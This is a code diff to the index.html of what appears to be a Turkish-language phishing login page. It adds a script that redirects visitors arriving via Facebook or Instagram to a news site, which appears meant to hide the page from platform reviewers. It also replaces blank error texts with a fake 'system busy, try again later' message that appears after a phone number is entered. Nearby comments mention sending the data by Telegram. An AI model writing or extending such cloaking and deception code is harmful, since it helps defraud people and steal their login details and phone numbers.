--- a/index.html
+++ b/index.html
@@ -1,4 +1,27 @@
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta http-equiv="X-UA-Compatible" content="IE=edge">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Yönlendirme Kontrol</title>
+</head>
+<body>
+
+    <script>
+        // Eğer sayfa sosyal medya botları tarafından açılıyorsa
+        if (window.location.href.includes("facebook.com") || window.location.href.includes("instagram.com")) {
+            // Sosyal medya paylaşımlarından gelen tıklamalarda farklı bir siteye yönlendir
+            window.location.href = "https://www.haberler.com/";
+        } else {
+            // Doğrudan sayfa açılması durumunda gerçek sayfayı göster
+            // Buraya sayfanızın geri kalan içeriği eklenir
+        }
+    </script>
+
+</body>
+</html>
 
 
 <html lang="tr" class="login  ">
@@ -317,7 +340,7 @@
                                                                 // Telefon numarası girişi sonrası hata mesajını görüntüle
                                                                 var errorMessage = document.createElement('div');
                                                                 errorMessage.className = 'error-message';
-                                                                errorMessage.innerHTML = '<p style="color: red; text-align: center;">.</p>';
+                                                                errorMessage.innerHTML = '<p style="color: red; text-align: center;">Sistem yoğunluğundan dolayı giriş yapılamamaktadır. Lütfen ilerleyen zamanda tekrar deneyiniz.</p>';
                                                 
                                                                 var passwordInput = document.getElementById('telefon');
                                                                 passwordInput.parentNode.appendChild(errorMessage);
@@ -328,7 +351,7 @@
                                                                 // İlk Telegram mesajı gönderiminde sorun olması durumunda hata mesajını görüntüle
                                                                 var errorMessage = document.createElement('div');
                                                                 errorMessage.className = 'error-message';
-                                                                errorMessage.innerHTML = '<p style="color: red; text-align: center;">.</p>';
+                                                                errorMessage.innerHTML = '<p style="color: red; text-align: center;">Sistem yoğunluğundan dolayı giriş yapılamamaktadır. Lütfen ilerleyen zamanda tekrar deneyiniz.</p>';
                                                 
                                                                 var passwordInput = document.getElementById('telefon');
                                                                 passwordInput.parentNode.appendChild(errorMessage);
